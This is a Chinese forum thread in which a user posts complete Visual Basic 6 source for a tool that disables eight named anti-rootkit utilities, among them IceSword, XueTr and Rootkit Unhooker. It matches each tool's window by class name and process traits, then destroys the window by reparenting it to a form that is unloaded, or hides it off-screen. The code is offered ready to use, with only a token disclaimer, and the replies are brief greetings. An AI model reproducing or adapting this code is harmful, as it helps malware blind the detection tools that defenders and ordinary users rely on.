[半原创]窗口攻击废除ARK功能 - TaAttackWindow(AARK)

HoviDelphic

在学校上不了网真是不爽啊，今天回家终于能上网了！
很多ARK都有很强的进程自我保护，很可惜，让ARK无法使用根本无需结束进程，直接搞窗口就行了。
我无聊时写了个无聊的程序，能使8个ARK无法工作。
提供完整代码，希望大家不要拿去做坏事。

Module1.bas

1. 
   
2. Option Explicit
   
3. 
   
4. Public Declare Function EnumWindows Lib "user32" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
   
5. Public Declare Function SetParent Lib "user32.dll" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long
   
6. Public Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
   
7. Public Declare Function GetForegroundWindow Lib "user32.dll" () As Long
   
8. Public Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
   
9. Public Declare Function GetClassName Lib "user32.dll" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
   
10. Public Declare Function GetWindowTextLength Lib "user32.dll" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
    
11. Public Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
    
12. Public Declare Function MoveWindow Lib "user32.dll" (ByVal hwnd As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
    
13. Public Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
    
14. 
    
15. Dim GetPid As Long
    
16. 
    
17. Private Function EnumWindowsProc(ByVal hwnd As Long, ByVal lParam As Long) As Long
    
18.     Dim hWnd1, hWnd2 As Long
    
19.     hWnd1 = FindWindowEx(hwnd, 0, "AfxMDIFrame42s", vbNullString) '冰刃的两个特征
    
20.     hWnd2 = FindWindowEx(hwnd, 0, "AfxControlBar42s", vbNullString)
    
21.     If hWnd1 <> 0 And hWnd2 <> 0 Then
    
22.         GetWindowThreadProcessId hwnd, GetPid
    
23.     End If
    
24.     EnumWindowsProc = True
    
25. End Function
    
26. 
    
27. Public Function FindIceSwordPid() As Long
    
28.     EnumWindows AddressOf EnumWindowsProc, 0
    
29.     FindIceSwordPid = GetPid
    
30. End Function
    

复制代码

Form1.frm

1. 
   
2. Option Explicit
   
3. 
   
4. Private Sub KillWnd(ByVal WindowHandle As Long)
   
5.     Load Form2
   
6.     SetParent WindowHandle, Form2.hwnd
   
7.     Unload Form2
   
8. End Sub
   
9. 
   
10. Private Sub Command1_Click()
    
11.     Timer1.Enabled = True
    
12.     Timer2.Enabled = True
    
13.     Timer3.Enabled = True
    
14.     Timer4.Enabled = True
    
15.     Timer5.Enabled = True
    
16.     Timer6.Enabled = True
    
17.     Timer7.Enabled = True
    
18.     Timer8.Enabled = True
    
19. End Sub
    
20. 
    
21. 'Anti IceLight
    
22. Private Sub Timer1_Timer()
    
23.     Dim bkHwnd As Long, slen As Long, r As Long, RetVal As Long, hd0 As Long, hd8 As Long
    
24.     Dim tstr As String, lpClassName As String
    
25.     bkHwnd = GetForegroundWindow()
    
26.     If bkHwnd <> 0 Then
    
27.         slen = GetWindowTextLength(bkHwnd) '获取窗口标题文本长度
    
28.         tstr = String$(slen, 0)
    
29.         r = GetWindowText(bkHwnd, tstr, slen + 1) '获取窗口标题
    
30.         lpClassName = Space(256)
    
31.         RetVal = GetClassName(bkHwnd, lpClassName, 256)
    
32.         lpClassName = Left$(lpClassName, RetVal)
    
33.         If tstr = "" And lpClassName = "ThunderRT6FormDC" Then
    
34.             hd8 = FindWindowEx(bkHwnd, 0, "ThunderRT6UserControlDC", vbNullString) ': MsgBox Hex(hd8)
    
35.             hd0 = FindWindowEx(bkHwnd, 0, "ThunderRT6PictureBoxDC", vbNullString) ': MsgBox Hex(hd0)
    
36.             If hd8 <> 0 And hd0 <> 0 Then
    
37.                 KillWnd bkHwnd
    
38.                 'Timer1.Enabled = False
    
39.             End If
    
40.         End If
    
41.     End If
    
42. End Sub
    
43. 
    
44. 'Anti PsNull
    
45. Private Sub Timer2_Timer()
    
46.     Dim bkHwnd As Long, slen As Long, r As Long, RetVal As Long, itsPID As Long, itsTID As Long, hd1 As Long, hd3 As Long
    
47.     Dim tstr As String, lpClassName As String
    
48.     bkHwnd = GetForegroundWindow() ': MsgBox Hex(bkHwnd)
    
49.     If bkHwnd <> 0 Then
    
50.         slen = GetWindowTextLength(bkHwnd) '获取窗口标题文本长度
    
51.         tstr = String$(slen, 0)
    
52.         r = GetWindowText(bkHwnd, tstr, slen + 1) '获取窗口标题
    
53.         lpClassName = Space(256)
    
54.         RetVal = GetClassName(bkHwnd, lpClassName, 256)
    
55.         lpClassName = Left$(lpClassName, RetVal) ': MsgBox lpClassName
    
56.         itsTID = GetWindowThreadProcessId(bkHwnd, itsPID)
    
57.         If tstr <> "" And lpClassName = "ThunderRT6Form" And itsPID = 0 And itsTID = 0 Then
    
58.             hd1 = FindWindowEx(bkHwnd, 0, "SysListView32", vbNullString) ': MsgBox Hex(hd1)
    
59.             hd3 = FindWindowEx(bkHwnd, 0, "SysTabControl32", vbNullString) ': MsgBox Hex(hd3)
    
60.             If hd1 <> 0 And hd3 <> 0 Then
    
61.                 KillWnd bkHwnd
    
62.                 'Timer2.Enabled = False
    
63.             End If
    
64.         End If
    
65.     End If
    
66. End Sub
    
67. 
    
68. 'Anti Rootkit Unhooker
    
69. Private Sub Timer3_Timer()
    
70.     Dim bkHwnd As Long, slen As Long, r As Long, RetVal As Long, itsPID As Long, itsTID As Long, hd1 As Long
    
71.     Dim tstr As String, lpClassName As String
    
72.     bkHwnd = GetForegroundWindow() ': MsgBox Hex(bkHwnd)
    
73.     If bkHwnd <> 0 Then
    
74.         slen = GetWindowTextLength(bkHwnd) '获取窗口标题文本长度
    
75.         tstr = String$(slen, 0)
    
76.         r = GetWindowText(bkHwnd, tstr, slen + 1) '获取窗口标题
    
77.         lpClassName = Space(256)
    
78.         RetVal = GetClassName(bkHwnd, lpClassName, 256)
    
79.         lpClassName = Left$(lpClassName, RetVal) ': MsgBox lpClassName
    
80.         itsTID = GetWindowThreadProcessId(bkHwnd, itsPID) ': MsgBox itsPID, , itsTID
    
81.         If tstr = "" And lpClassName <> "" And itsPID <> 0 And itsTID <> 0 Then
    
82.             hd1 = OpenProcess(1, 0, itsPID)
    
83.             If hd1 <= 0 Then
    
84.                 KillWnd bkHwnd
    
85.                 'Timer3.Enabled = False
    
86.             End If
    
87.         End If
    
88.     End If
    
89. End Sub
    
90. 
    
91. 'Anti IceSword
    
92. Private Sub Timer4_Timer()
    
93.     Dim IsPID As Long, bkHwnd As Long, bkPID As Long
    
94.     IsPID = FindIceSwordPid
    
95.     bkHwnd = GetForegroundWindow() ': MsgBox Hex(bkHwnd)
    
96.     GetWindowThreadProcessId bkHwnd, bkPID
    
97.     If bkPID = IsPID Then
    
98.         KillWnd bkHwnd
    
99.         'Timer4.Enabled = False
    
100.     End If
     
101. End Sub
     
102. 
     
103. 'Anti SnipeSword
     
104. Private Sub Timer5_Timer()
     
105.     Dim bkHwnd As Long, slen As Long, r As Long, RetVal As Long, itsPID As Long, itsTID As Long, hd1 As Long
     
106.     Dim tstr As String, lpClassName As String
     
107.     bkHwnd = GetForegroundWindow() ': MsgBox Hex(bkHwnd)
     
108.     If bkHwnd <> 0 Then
     
109.         slen = GetWindowTextLength(bkHwnd) '获取窗口标题文本长度
     
110.         tstr = String$(slen, 0)
     
111.         r = GetWindowText(bkHwnd, tstr, slen + 1) '获取窗口标题
     
112.         lpClassName = Space(256)
     
113.         RetVal = GetClassName(bkHwnd, lpClassName, 256)
     
114.         lpClassName = Left$(lpClassName, RetVal) ': MsgBox lpClassName
     
115.         If InStr(1, tstr, "狙剑") <> 0 And lpClassName = "ClientWindow" Then
     
116.             itsTID = GetWindowThreadProcessId(bkHwnd, itsPID) ': MsgBox itsPID, , itsTID
     
117.             hd1 = OpenProcess(1, 0, itsPID)
     
118.             If hd1 < 0 Then
     
119.                 KillWnd bkHwnd
     
120.                 'Timer5.Enabled = False
     
121.             End If
     
122.         End If
     
123.     End If
     
124. End Sub
     
125. 
     
126. 'Anti WSysCheck
     
127. Private Sub Timer6_Timer()
     
128.     Dim bkHwnd As Long, slen As Long, r As Long, RetVal As Long, hd0 As Long, hd8 As Long
     
129.     Dim tstr As String, lpClassName As String
     
130.     bkHwnd = GetForegroundWindow()
     
131.     If bkHwnd <> 0 Then
     
132.         slen = GetWindowTextLength(bkHwnd) '获取窗口标题文本长度
     
133.         tstr = String$(slen, 0)
     
134.         r = GetWindowText(bkHwnd, tstr, slen + 1) '获取窗口标题
     
135.         lpClassName = Space(256)
     
136.         RetVal = GetClassName(bkHwnd, lpClassName, 256)
     
137.         lpClassName = Left$(lpClassName, RetVal)
     
138.         If tstr <> "" And lpClassName <> "" Then
     
139.             hd8 = FindWindowEx(bkHwnd, 0, "TPageControl", vbNullString) ': MsgBox Hex(hd8)
     
140.             hd0 = FindWindowEx(bkHwnd, 0, "TStatusBar", vbNullString) ': MsgBox Hex(hd0)
     
141.             If hd8 <> 0 And hd0 <> 0 Then
     
142.                 KillWnd bkHwnd
     
143.                 'Timer6.Enabled = False
     
144.             End If
     
145.         End If
     
146.     End If
     
147. End Sub
     
148. 
     
149. 'Anti XueTr
     
150. Private Sub Timer7_Timer()
     
151.     Dim bkHwnd As Long, slen As Long, r As Long, RetVal As Long, itsPID As Long, itsTID As Long
     
152.     Dim tstr As String, lpClassName As String
     
153.     bkHwnd = GetForegroundWindow()
     
154.     If bkHwnd <> 0 Then
     
155.         slen = GetWindowTextLength(bkHwnd) '获取窗口标题文本长度
     
156.         tstr = String$(slen, 0)
     
157.         r = GetWindowText(bkHwnd, tstr, slen + 1) '获取窗口标题
     
158.         lpClassName = Space(256)
     
159.         RetVal = GetClassName(bkHwnd, lpClassName, 256)
     
160.         lpClassName = Left$(lpClassName, RetVal)
     
161.         If tstr <> "" And lpClassName = "#32770" Then
     
162.             itsTID = GetWindowThreadProcessId(bkHwnd, itsPID) ': MsgBox itsPID, , itsTID
     
163.             If itsPID = 0 And itsTID = 0 Then
     
164.                 MoveWindow bkHwnd, -10000, -10000, 1, 1, 1
     
165.                 'Timer6.Enabled = False
     
166.             End If
     
167.         End If
     
168.     End If
     
169. End Sub
     
170. 
     
171. 'Anti TY(天琊)
     
172. Private Sub Timer8_Timer()
     
173.     Dim bkHwnd As Long, i As Long, itsPID As Long
     
174.     bkHwnd = GetForegroundWindow()
     
175.     If bkHwnd = 0 Then 'TY存在，否则无论何时此值都不会为零
     
176.         For i = 10000 To &H999999
     
177.             Call GetWindowThreadProcessId(i, itsPID)
     
178.             If itsPID = 0 Then
     
179.                 MoveWindow i, -10000, -10000, 1, 1, 0
     
180.             End If
     
181.         Next
     
182.         'Timer8.Enabled = False
     
183.     End If
     
184. End Sub
     

复制代码

Form2.frm

1. 
   
2. 'No code
   

复制代码

相信大家能写出比这个更好的代码。

shixiaoxu

欢迎TA回来！
呵呵。。。

oopww

welcome！

Tesla.Angela

呵呵，最近比较忙，没时间上网，HD那个号还是在管理时才使用吧。

HoviDelphic

围观楼上SYF大牛。

8013

围观，谁叫你们都写牛X！~···